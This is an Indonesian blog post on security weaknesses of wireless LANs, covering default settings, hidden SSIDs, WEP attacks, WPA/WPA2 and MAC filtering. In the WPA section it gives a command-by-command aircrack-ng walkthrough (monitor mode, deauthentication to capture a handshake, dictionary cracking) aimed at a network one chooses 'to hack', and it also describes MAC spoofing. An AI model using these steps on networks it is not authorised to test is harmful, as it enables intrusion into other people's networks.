Pages - Menu

Senin, 14 Januari 2013

Kelemahan-Kelemahan Pada Jaringan WLAN


Kelemahan IP Default

kelemahan jika kita menggunakan IP default adalah, bnyknya oknum yang tidak bertanggung jawab merubah settingan AP yang kita gunakan, sehingga merugikan user lain.

Kelemahan Memakai SSID

SSID digunakan sebagai metode untuk otentikasi. Namun tidaklah mencukupi hanya mengandalkan SSID untuk jaringan WLAN yang cukup besar. Semakin banyak pengguna yang mengetahui SSID ini, akan semakin besar pula kemungkinan penyalahgunaannya. Bisa saja administrator secara rutin mengubah password (SSID) ini secara rutin. Namun dalam jaringan yang besar hal ini akan memerlukan usaha yang besar pula dan tidak praktis. Selain itu pada kenyataannya kebanyak AP secara default mem-broadcast SSID dalam sinyal WLAN. Juga banyak terdapat AP yang masih menggunakan nilai default SSID yang diberikan oleh pabrik pembuat. Padahal daftar default SSID ini dapat dengan mudah diperoleh siapa saja di Internet. Hal ini akan sangat memudahkan pihak lain yang tidak dikehendaki dapat mengakses atau menyerang WLAN tersebut.

Biasanya, pada jaringan WLAN yang tidak public para administrator menyembunyikan SSIDnya. selain untuk mencegah banyak user lain yang tidak berkepentingannya terkoneksi, tapi juga mencegah terjadinya hacking dari oknum tidak bertanggung jawab. namun Hal  ini  tidaklah  benar,  karena  SSID sebenarnya tidak dapat disembuyikan secara sempurna.  Pada  saat  saat  tertentu  atau khususnya  saat  client  akan  terhubung (assosiate)  atau  ketika  akan  memutuskan diri (deauthentication) dari sebuah jaringan wireless,  maka  client  akan  tetap mengirimkan SSID dalam bentuk plain text (meskipun menggunakan enkripsi), sehingga jika bermaksud menyadapnya, dapat dengan mudah  menemukan  informasi  tersebut. Beberapa tools yang dapat digunakan untuk mendapatkan ssid yang dihidden antara lain, kismet  (kisMAC),  ssid_jack  (airjack), aircrack , void11 dan masih banyak lagi.

Kelemahan WEP

WEP memiliki berbagai kelemahan antara lain:
1. Masalah kunci yang lemah, algoritma RC4 yang digunakan dapat dipecahkan.
2. WEP menggunakan kunci yang bersifat statis
3. Masalah initialization vector (IV) WEP
4. Masalah integritas pesan Cyclic Redundancy Check (CRC-32)
WEP terdiri dari dua tingkatan, yakni kunci 64 bit, dan 128 bit. Sebenarnya kunci rahasia pada kunci WEP 64 bit hanya 40 bit, sedang 24bit merupakan Inisialisasi Vektor (IV).Demikian juga pada kunci WEP 128 bit, kunci rahasia terdiri dari 104bit.

Serangan-serangan pada kelemahan WEP antara lain:
3.1  Serangan terhadap kelemahan inisialisasi vektor (IV), sering disebut FMS
attack. FMS singkatan dari nama ketiga penemu kelemahan IV yakni
Fluhrer, Mantin, dan Shamir. Serangan ini dilakukan dengan cara
mengumpulkan IV yang lemah sebanyak-banyaknya. Semakin banyak IV
lemah yang diperoleh, semakin cepat ditemukan kunci yang digunakan

3.2  Mendapatkan IV yang unik melalui packet data yang diperoleh untuk diolah
untuk proses cracking kunci WEP dengan lebih cepat. Cara ini disebut
chopping attack, pertama kali ditemukan oleh h1kari. Teknik ini hanya
membutuhkan IV yang unik sehingga mengurangi kebutuhan IV yang
lemah dalam melakukan cracking WEP.

3.3  Kedua serangan diatas membutuhkan waktu dan packet yang cukup, untuk
mempersingkat waktu, para hacker biasanya melakukan traffic injection.
Traffic Injection yang sering dilakukan adalah dengan cara mengumpulkan
packet ARP kemudian mengirimkan kembali ke access point. Hal ini
mengakibatkan pengumpulan initial vektor lebih mudah dan cepat. Berbeda
dengan serangan pertama dan kedua, untuk serangan traffic injection,diperlukan spesifikasi alat dan aplikasi tertentu yang mulai jarang
ditemui di toko-toko, mulai dari chipset, versi firmware, dan versi driver
serta tidak jarang harus melakukan patching terhadap driver dan
aplikasinya.

Kelemahan WPA (WPA1,WPA2)

WPA (bahasa Inggris: Wi-Fi Protected Access) adalah suatu sistem yang juga dapat diterapkan untuk mengamankan jaringan nirkabel. Metoda pengamanan dengan WPA ini diciptakan untuk melengkapi dari sistem yamg sebelumnya, yaitu WEP. Para peneliti menemukan banyak celah dan kelemahan pada infrastruktur nirkabel yang menggunakan metoda pengamanan WEP.

Sebagai pengganti dari sistem WEP, WPA mengimplementasikan layer dari IEEE, yaitu layer 802.11i. Nantinya WPA akan lebih banyak digunakan pada implementasi keamanan jaringan nirkabel. WPA didesain dan digunakan dengan alat tambahan lainnya, yaitu sebuah komputer pribadi (PC). Fungsi dari komputer pribadi ini kemudian dikenal dengan istilah authentication server, yang memberikan key yang berbeda kepada masing-masing pengguna/client dari suatu jaringan nirkabel yang menggunakan akses point sebagai media sentral komunikasi. Seperti dengan jaringan WEP, metoda enkripsi dari WPA ini juga menggunakan algoritma RC4.

Pengamanan jaringan nirkabel dengan metoda WPA ini, dapat ditandai dengan minimal ada tiga pilihan yang harus diisi administrator jaringan agar jaringan dapat beroperasi pada mode WPA ini. Ketiga menu yang harus diisi tersebut adalah:

* Server
o Komputer server yang dituju oleh akses point yang akan memberi otontikasi kepada client. beberapa perangkat lunak yang biasa digunakan antara lain freeRADIUS, openRADIUS dan lain-lain.

* Port
o Nomor port yang digunakan adalah 1812.

* Shared Secret
o Shared Secret adalah kunci yang akan dibagikan ke komputer dan juga kepada client secara transparant.

Setelah komputer diinstall perangkat lunak otontikasi seperti freeRADIUS, maka sertifikat yang dari server akan dibagikan kepada client. Untuk menggunakan Radius server bisa juga dengan tanpa menginstall perangkat lunak di sisi komputer client. Cara yang di gunakan adalah Web Authentication dimana User akan diarahkan ke halaman Login terlebih dahulu sebelum bisa menggunakan Jaringan Wireless. Dan Server yang menangani autentikasi adalah Radius server.

* WPA-PSK

WPA-PSK (Wi-Fi Protected Access – Pre Shared Key) adalah pengamanan jaringan nirkabel dengan menggunakan metoda WPA-PSK jika tidak ada authentikasi server yang digunakan. Dengan demikian access point dapat dijalankan dengan mode WPA tanpa menggunakan bantuan komputer lain sebagai server. Cara mengkonfigurasikannya juga cukup sederhana. Perlu diketahui bahwa tidak semua access point akan mempunyai fasilitas yang sama dan tidak semua access point menggunakan cara yang sama dalam mendapatkan Shared-Key yang akan dibagikan ke client.

Pada access point Dlink DWL-2000AP, pemberian Shared-Key dilakukan secara manual tanpa mengetahui algoritma apa yang digunakan. Keadaan ini berbanding terbalik dengan akses point Linksys WRT54G, dimana administrator dapat memilih dari dua algoritma WPA yang disediakan, yang terdiri dari algoritma TKIP atau algoritma AES.
Setelah Shared-Key didapat, maka client yang akan bergabung dengan access point cukup memasukkan angka/kode yang diijinkan dan dikenal oleh access point. Prinsip kerja yang digunakan WPA-PSK sangat mirip dengan pengamanan jaringan nirkabel dengan menggunakan metoda Shared-Key.

* WPA2

WPA2 adalah sertifikasi produk yang tersedia melalui Wi-Fi Alliance. WPA2 Sertifikasi hanya menyatakan bahwa peralatan nirkabel yang kompatibel dengan standar IEEE 802.11i. WPA2 sertifikasi produk yang secara resmi menggantikan wired equivalent privacy (WEP) dan fitur keamanan lain yang asli standar IEEE 802.11. WPA2 tujuan dari sertifikasi adalah untuk mendukung wajib tambahan fitur keamanan standar IEEE 802.11i yang tidak sudah termasuk untuk produk-produk yang mendukung WPA.

Update WPA2/WPS IE yang mendukung WPA2 fitur berikut:

* WPA2 Enterprise IEEE 802.1X menggunakan otentikasi dan WPA2 Personal menggunakan tombol preshared (PSK).

Untuk kelemahannya, WPA, WPA2, dan WPA/PSK dapat dihack menggunakan tools dapat digunakan sampai saat ini yaitu  CoWPAtty (http://www.churchofwifi.org/ ) dan aircrack (http://www.aircrackng.org). atau jika dapat menggunakan backtrack dengan turtor berikut.

root@bt:-# airmon-ng

root@bt:-# airmon-ng stop wlan0

root@bt:-# airmon-ng start wlan0

root@bt:-# airodump-ng wlan0 (disini akan dilihat macam2 wireles yang sedang aktif yang terdeteksi, pilih bssid yg akan di hack yaitu dengan di copy bssid tersebut dan perhatikan bagian ch yaitu berarti chanel yg harus di ingat)

root@bt:-# airodump-ng -c 6 -w zhome –bssid 00:6B:7B:A1:11:8B mon0 (c=chanel dan bssid yang saya cantumkan hanya contoh dan ganti sesuai dengan bssid dan chanel yg mau di hack, setelah itu enter dan tunggu hingga station mengeluarkan semacam bssid setelah itu buka terminal kedua dan ketikan)

root@bt:-# aireplay-ng -0 5 -a 00:6B:7B:A1:11:8B -c 89:AS:84:B3:89:7C mon0 (kemudian lihat di terminal pertama dan akan di dapatkan handshake dipojok kanan atas, tekan keyboard ctrl+c)
root@bt:-# aircrack-ng -w /pentest/passwords/wordlists/darkc0de.lst zhome*.cap (darkc0de adalah dictionary passpharase bawaan backtrack 4)

Kelemahan MAC Filtering

Hampir setiap wireless access point maupun router difasilitasi dengan keamanan MAC Filtering. Hal ini sebenarnya tidak banyak membantu dalam mengamankan komunikasi wireless, karena MAC address sangat mudah dispoofing atau bahkan dirubah. Tools ifconfig pada OS Linux/Unix atau beragam tools spt network utilitis, regedit, smac, machange pada OS windows dengan mudah digunakan untuk spoofing atau mengganti MAC address.

Masih sering ditemukan wifi di perkantoran dan bahkan ISP (yang biasanya digunakan oleh warnet-warnet) yang hanya menggunakan proteksi MAC Filtering. Dengan menggunakan aplikasi wardriving seperti kismet/kisMAC atau aircrack tools, dapat diperoleh informasi MAC address tiap client yang sedang terhubung ke sebuah Access Point. Setelah mendapatkan informasi tersebut, kita dapat terhubung ke Access point dengan mengubah MAC sesuai dengan client tadi. Pada jaringan wireless, duplikasi MAC address tidak mengakibatkan konflik. Hanya membutuhkan IP yang berbeda dengan client yang tadi.